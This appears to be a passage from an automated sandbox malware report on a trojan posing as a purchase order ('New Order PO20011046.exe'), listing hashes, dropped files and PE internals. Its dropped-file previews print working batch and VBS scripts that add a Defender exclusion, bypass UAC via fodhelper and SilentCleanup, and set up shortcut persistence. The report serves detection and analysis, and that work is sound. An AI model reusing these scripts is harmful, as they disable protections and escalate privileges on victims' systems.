                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.jsGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.jsGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Piraeus Bank_swift_.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          FxzOwcXb7x.exeGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Izipubob.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          nivude1.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Accesshover.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\Public\Xzqvp.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):86
                                                                                                          Entropy (8bit):4.565344987058984
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:pFEjDaHF598TULLvBRVPjDaHF598TULLvBRy:pFEPaHhdLbnVPPaHhdLbny
                                                                                                          MD5:7FD082AAA613DEE2AC4DFE43AA568452
                                                                                                          SHA1:24C764D19008C8E6E0EA2B92D26D5A7EEDA39A3B
                                                                                                          SHA-256:45CF90DB799654A9E3BA1CB487E2169FFBE28E73D0EDDBF7453C25125FEC979C
                                                                                                          SHA-512:566986F5B9FD898101491C2649F242A5DEEC6A3D4E2F4F5A2761DBAFABF10733F7933C78CBBAFF5FEDCC302F5CF7E91BEA2CB3E7B6FEE05F4CA32C013B2B53B0
                                                                                                          Malicious:false
                                                                                                          Preview: cmd /c C:\Users\Public\Xzqvpcvb.vbs..exit..cmd /c C:\Users\Public\Xzqvpcvb.vbs..exit..
                                                                                                          C:\Users\Public\Xzqvpcvb.vbs
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):530
                                                                                                          Entropy (8bit):4.98731455850251
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:fDNZcAqSPK+uSLKMPncwWkqcgpDNZcAqSPK+uSLKMPncwWkqcg5:fDN2AqsOM/NWkqcgpDN2AqsOM/NWkqck
                                                                                                          MD5:6FFC5D3B2EEA8DE8E112C11EF172C202
                                                                                                          SHA1:08928DAAD7F51C719F21753FA77ECD2E22438A1F
                                                                                                          SHA-256:1DA88FA21B51E47D5EBAB7004DB14CD825646545A22BB8E4B9137910060FFDA2
                                                                                                          SHA-512:3D7E63D15446E248188889951B3AA7BAC1CB45FCDB2FFA4533FDBD3F820607F2B190E6AA0C321D71D71BC1DEE8A661E5C74BECD356AFD6B2EE5B4ACF772A3C5A
                                                                                                          Malicious:false
                                                                                                          Preview: dim FSO, objShell, strApp..set FSO = CreateObject("Scripting.FileSystemObject")..set objShell = CreateObject("Wscript.Shell")..path = "C:\Users\Public\Xzqvphcc.bat"..if FSO.FileExists(path) then..objShell.Run path, 0, false..Set objShellSh = Nothing..else..end if..dim FSO, objShell, strApp..set FSO = CreateObject("Scripting.FileSystemObject")..set objShell = CreateObject("Wscript.Shell")..path = "C:\Users\Public\Xzqvphcc.bat"..if FSO.FileExists(path) then..objShell.Run path, 0, false..Set objShellSh = Nothing..else..end if..
                                                                                                          C:\Users\Public\Xzqvphcc.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):590
                                                                                                          Entropy (8bit):4.692054461517121
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:s8MeMQ7huqfDutOoN98MeMQ7huqfDutOoa:We/9uqfDutOqDe/9uqfDutOh
                                                                                                          MD5:A94C89BF90B24D3CE502FFA49B083A0E
                                                                                                          SHA1:CDD29B18E578429246C7482EA23EBBF53DBBF499
                                                                                                          SHA-256:48B9A3DCD7D1670772C2BD085CC0588D9A5B8529F602F5B6055DE9327C52CCD9
                                                                                                          SHA-512:D0E1BF66A95E2DA8C68C409D90E7134CE224B01D5894069BE24DD27BA7FC5F4A4D5BF3E254F5D702EE919D4AE86205409A42D6151BE50A88E785E0C4E05A906A
                                                                                                          Malicious:false
                                                                                                          Preview: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local ..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..mkdir "C:\Windows\Finex"..exit..powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local ..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..mkdir "C:\Windows\Finex"..exit..
                                                                                                          C:\Users\Public\Xzqvptso.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):673
                                                                                                          Entropy (8bit):5.055242933466055
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:rgaX0WMYaXe1uOeV9gaXsbbyid1e4ziLpVmWEM3/jEb6dTD1Mn:rnX0dvXrOeV9nXsCIE4eTMTsSn
                                                                                                          MD5:F30EA4775996A873C0AD2C14679C9D97
                                                                                                          SHA1:05955BE0B5BE66FC7E1F582CD572EECC6E238C6F
                                                                                                          SHA-256:31F4287BD7007AF20FCE126ABD7D4AEA174C51DB2DE09D7F8A41AFED510689B5
                                                                                                          SHA-512:28BA7D44BAEF419B6831B47F0705B2E3966FB54808B050A2F802E5A857A0E6AA3CB34A627080758E1E40722188BD6D78AAD65A66CCE14FEB2693580D344BE924
                                                                                                          Malicious:false
                                                                                                          Preview: reg delete hkcu\Environment /v windir /f ..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I..reg delete hkcu\Environment /v windir /f REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f.REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f.fodhelper.exe.cmd /c start /min C:\Users\Public\x.bat
                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1311424
                                                                                                          Entropy (8bit):7.189657105883589
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:FiLDfJXRq+fowpGG7By3Z72mwq8gKmX9hIbEIKn:FiLr5By3Z7NWgKAj
                                                                                                          MD5:310A7CA550B9997D0E0BCAF645530303
                                                                                                          SHA1:5617D1E233381EA3FD6AB796FCC6A2DE66137C51
                                                                                                          SHA-256:0EE90C988386390753A1954692A658E393D761887ECFBFD100105C365A3EBC34
                                                                                                          SHA-512:C6D438F7CCAEC0DCB5F64CBF50B05AF909366EA30C15C15C38CD1ABBAF02E7228A26C36781E140841DAA79C138BD0C63DEF9AB769EE40C2525A6A950B1107175
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0...................@...........................0...".......................T......8............................p......................................................CODE....|........................... ..`DATA....T).......*..................@...BSS.....M................................idata..."...0...$..................@....tls.........`...........................rdata.......p......................@..P.reloc..8...........................@..P.rsrc...............................@..P.............0......................@..P........................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\uvvE.url
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Evvudrv.exe>), ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):169
                                                                                                          Entropy (8bit):5.15339576531091
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:HRAbABGQYmHmEX+Ro6p4EkD5oef5yaKYTvQJ5ontCBuXV9k/qIH19Yxv:HRYFVmcKaJkDlR9NvQJ5OtZF9k/qI72v
                                                                                                          MD5:B0A940253E10E504ECD095FED46C0E83
                                                                                                          SHA1:683B39147B3ACE175BE29D6F8FBFB5B8F85D65B0
                                                                                                          SHA-256:4071F88611A9C05F83FF964309BB8F5DCF56E07DFB40388D732D47EF842A91DE
                                                                                                          SHA-512:4FCABD03392A263476576525A479B9861B20D396C73108B8C4BA001FC2DE7C0775ACD845A6D6D602D6D8EB348EFB87FEE765230745C6D76F73993019AE65B166
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          Preview: [InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Evvudrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..
                                                                                                          C:\Windows\assembly\Desktop.ini
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):227
                                                                                                          Entropy (8bit):5.2735028737400205
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:a1eZBXVNYTF0NwoScUbtSgyAXIWv7v5PMKq:UeZBFNYTswUq1r5zq
                                                                                                          MD5:F7F759A5CD40BC52172E83486B6DE404
                                                                                                          SHA1:D74930F354A56CFD03DC91AA96D8AE9657B1EE54
                                                                                                          SHA-256:A709C2551B8818D7849D31A65446DC2F8C4CCA2DCBBC5385604286F49CFDAF1C
                                                                                                          SHA-512:A50B7826BFE72506019E4B1148A214C71C6F4743C09E809EF15CD0E0223F3078B683D203200910B07B5E1E34B94F0FE516AC53527311E2943654BFCEADE53298
                                                                                                          Malicious:false
                                                                                                          Preview: ; ==++==..; ..; Copyright (c) Microsoft Corporation. All rights reserved...; ..; ==--==..[.ShellClassInfo]..CLSID={1D2680C9-0E2A-469d-B787-065558BC7D43}..ConfirmFileOp=1..InfoTip=Contains application stability information...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):7.189657105883589
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                                                          • InstallShield setup (43055/19) 0.43%
                                                                                                          • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                          File name:New Order PO20011046.exe
                                                                                                          File size:1311424
                                                                                                          MD5:310a7ca550b9997d0e0bcaf645530303
                                                                                                          SHA1:5617d1e233381ea3fd6ab796fcc6a2de66137c51
                                                                                                          SHA256:0ee90c988386390753a1954692a658e393d761887ecfbfd100105c365a3ebc34
                                                                                                          SHA512:c6d438f7ccaec0dcb5f64cbf50b05af909366ea30c15c15c38cd1abbaf02e7228a26c36781e140841daa79c138bd0c63def9ab769ee40c2525a6a950b1107175
                                                                                                          SSDEEP:24576:FiLDfJXRq+fowpGG7By3Z72mwq8gKmX9hIbEIKn:FiLr5By3Z7NWgKAj
                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                          File Icon

                                                                                                          Icon Hash:b2a8949ea686da6a

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x47d118
                                                                                                          Entrypoint Section:CODE
                                                                                                          Digitally signed:true
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                                          DLL Characteristics:
                                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:c7f986b767e22dea5696886cb4d7da70

                                                                                                          Authenticode Signature

                                                                                                          Signature Valid:false
                                                                                                          Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                          Error Number:-2146869232
                                                                                                          Not Before, Not After
                                                                                                          • 8/18/2016 10:17:17 PM 11/2/2017 9:17:17 PM
                                                                                                          Subject Chain
                                                                                                          • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                          Version:3
                                                                                                          Thumbprint MD5:3B66EDDAB891B79FEDB150AC2C59DB3A
                                                                                                          Thumbprint SHA-1:98ED99A67886D020C564923B7DF25E9AC019DF26
                                                                                                          Thumbprint SHA-256:57DD481BF26C0A55C3E867B2D6C6978BEAF5CE3509325CA2607D853F9349A9FF
                                                                                                          Serial:330000014096A9EE7056FECC07000100000140

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          add esp, FFFFFFF0h
                                                                                                          mov eax, 0047CE60h
                                                                                                          call 00007F897485DF95h
                                                                                                          lea edx, dword ptr [ebx+eax]
                                                                                                          push 00000019h
                                                                                                          mov eax, dword ptr [004807A4h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          call 00007F89748B30E8h
                                                                                                          mov ecx, dword ptr [00480750h]
                                                                                                          mov eax, dword ptr [004807A4h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          mov edx, dword ptr [0047C9ECh]
                                                                                                          call 00007F89748B30E8h
                                                                                                          mov eax, dword ptr [00480750h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          xor edx, edx
                                                                                                          call 00007F89748AC65Ah
                                                                                                          mov eax, dword ptr [004807A4h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          mov byte ptr [eax+5Bh], 00000000h
                                                                                                          mov eax, dword ptr [004807A4h]
                                                                                                          mov eax, dword ptr [eax]
                                                                                                          call 00007F89748B3143h
                                                                                                          call 00007F897485BA86h
                                                                                                          nop
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x830000x22b0.idata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x910000xb1400.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x13ae000x54c0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x8138.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x870000x18.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          CODE0x10000x7c17c0x7c200False0.522454053374data6.55138199518IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          DATA0x7e0000x29540x2a00False0.412109375data4.92006813937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          BSS0x810000x114d0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .idata0x830000x22b00x2400False0.355251736111data4.85312153514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .tls0x860000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x870000x180x200False0.05078125data0.206920017787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x880000x81380x8200False0.584435096154data6.65713214053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x910000xb14000xb1400False0.549846008903data7.13567802778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          RT_CURSOR0x9217c0x134data
                                                                                                          RT_CURSOR0x922b00x134data
                                                                                                          RT_CURSOR0x923e40x134data
                                                                                                          RT_CURSOR0x925180x134data
                                                                                                          RT_CURSOR0x9264c0x134data
                                                                                                          RT_CURSOR0x927800x134data
                                                                                                          RT_CURSOR0x928b40x134data
                                                                                                          RT_BITMAP0x929e80x1d0data
                                                                                                          RT_BITMAP0x92bb80x1e4data
                                                                                                          RT_BITMAP0x92d9c0x1d0data
                                                                                                          RT_BITMAP0x92f6c0x1d0data
                                                                                                          RT_BITMAP0x9313c0x1d0data
                                                                                                          RT_BITMAP0x9330c0x1d0data
                                                                                                          RT_BITMAP0x934dc0x1d0data
                                                                                                          RT_BITMAP0x936ac0x1d0data
                                                                                                          RT_BITMAP0x9387c0x1d0data
                                                                                                          RT_BITMAP0x93a4c0x1d0data
                                                                                                          RT_BITMAP0x93c1c0x5cdata
                                                                                                          RT_BITMAP0x93c780x5cdata
                                                                                                          RT_BITMAP0x93cd40x5cdata
                                                                                                          RT_BITMAP0x93d300x5cdata
                                                                                                          RT_BITMAP0x93d8c0x5cdata
                                                                                                          RT_BITMAP0x93de80x138data
                                                                                                          RT_BITMAP0x93f200x138data
                                                                                                          RT_BITMAP0x940580x138data
                                                                                                          RT_BITMAP0x941900x138data
                                                                                                          RT_BITMAP0x942c80x138data
                                                                                                          RT_BITMAP0x944000x138data
                                                                                                          RT_BITMAP0x945380x104data
                                                                                                          RT_BITMAP0x9463c0x138data
                                                                                                          RT_BITMAP0x947740x104data
                                                                                                          RT_BITMAP0x948780x138data
                                                                                                          RT_BITMAP0x949b00xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                          RT_ICON0x94a980x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                          RT_ICON0x94f000x988dataEnglishUnited States
                                                                                                          RT_ICON0x958880x10a8dataEnglishUnited States
                                                                                                          RT_ICON0x969300x25a8dataEnglishUnited States
                                                                                                          RT_ICON0x98ed80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 240, next used block 251658240EnglishUnited States
                                                                                                          RT_ICON0x9d1000x5488dataEnglishUnited States
                                                                                                          RT_ICON0xa25880x94a8dataEnglishUnited States
                                                                                                          RT_ICON0xaba300xa2a8dataEnglishUnited States
                                                                                                          RT_DIALOG0xb5cd80x52data
                                                                                                          RT_STRING0xb5d2c0x280data
                                                                                                          RT_STRING0xb5fac0x274data
                                                                                                          RT_STRING0xb62200x1ecdata
                                                                                                          RT_STRING0xb640c0x13cdata
                                                                                                          RT_STRING0xb65480x2c8data
                                                                                                          RT_STRING0xb68100xfcHitachi SH big-endian COFF object file, not stripped, 17664 sections, symbol offset=0x65007200, 83907328 symbols, optional header size 28672
                                                                                                          RT_STRING0xb690c0xf8data
                                                                                                          RT_STRING0xb6a040x128data
                                                                                                          RT_STRING0xb6b2c0x468data
                                                                                                          RT_STRING0xb6f940x37cdata
                                                                                                          RT_STRING0xb73100x39cdata
                                                                                                          RT_STRING0xb76ac0x3e8data
                                                                                                          RT_STRING0xb7a940xf4data
                                                                                                          RT_STRING0xb7b880xc4data
                                                                                                          RT_STRING0xb7c4c0x2c0data
                                                                                                          RT_STRING0xb7f0c0x478data
                                                                                                          RT_STRING0xb83840x3acdata
                                                                                                          RT_STRING0xb87300x2d4data
                                                                                                          RT_RCDATA0xb8a040x10data
                                                                                                          RT_RCDATA0xb8a140x398data
                                                                                                          RT_RCDATA0xb8dac0x494Delphi compiled form 'TLoginDialog'
                                                                                                          RT_RCDATA0xb92400x3c4Delphi compiled form 'TPasswordDialog'
                                                                                                          RT_RCDATA0xb96040x76f67GIF image data, version 89a, 577 x 188EnglishUnited States
                                                                                                          RT_RCDATA0x13056c0x11a42Delphi compiled form 'T__958758541'
                                                                                                          RT_GROUP_CURSOR0x141fb00x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x141fc40x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x141fd80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x141fec0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x1420000x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x1420140x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_CURSOR0x1420280x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                                          RT_GROUP_ICON0x14203c0x76dataEnglishUnited States
                                                                                                          RT_MANIFEST0x1420b40x2f0XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                          user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                          kernel32.dlllstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetROP2, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
